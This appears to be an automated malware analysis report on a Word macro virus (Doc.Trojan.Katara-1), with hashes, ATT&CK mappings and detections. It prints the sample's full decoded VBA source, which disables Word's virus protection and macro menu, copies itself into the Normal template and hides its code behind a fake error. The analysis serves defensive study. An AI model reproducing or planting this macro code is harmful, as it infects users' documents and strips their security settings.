Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 633f99fadd8b32f9…

MALICIOUS

Office (OLE)

Size: 29.5 KB
Created: 2000-03-30 23:19:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 407e76d888e6c7ec918da59e4391de30
SHA-1: 00a08088603e24316b2bfa83dc4a3d502f6ba6f3
SHA-256: 633f99fadd8b32f931f210546cb851c26565b44b3522c2da9c9123de7359385a
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to disable macro security warnings and modify the Normal template, which indicates an attempt to establish persistence for malicious code execution. The VBA code ensures the macro runs and copies itself into the Normal template, so that it executes again on subsequent document openings and could lead to further malicious activity.

Heuristics (2)

  • ClamAV: Doc.Trojan.Katara-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Katara-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1014 bytes
SHA-256: 3011a0b3cec5707dd72876e02019595fff370fb4772d4115493b1d2f319ea674
Detection: ClamAV: Doc.Trojan.Katara-1
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Aloha = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 18)
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
Set Host = Target.VBProject.VBComponents.Item(1).CodeModule
Host.DeleteLines 1, Host.CountOfLines
Host.AddFromString Aloha
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
MsgBox "ClassModule ZG012700", 0, "BSL4"
End Sub
Sub ViewVBCode()
MsgBox "Cannot export module class", 16
End Sub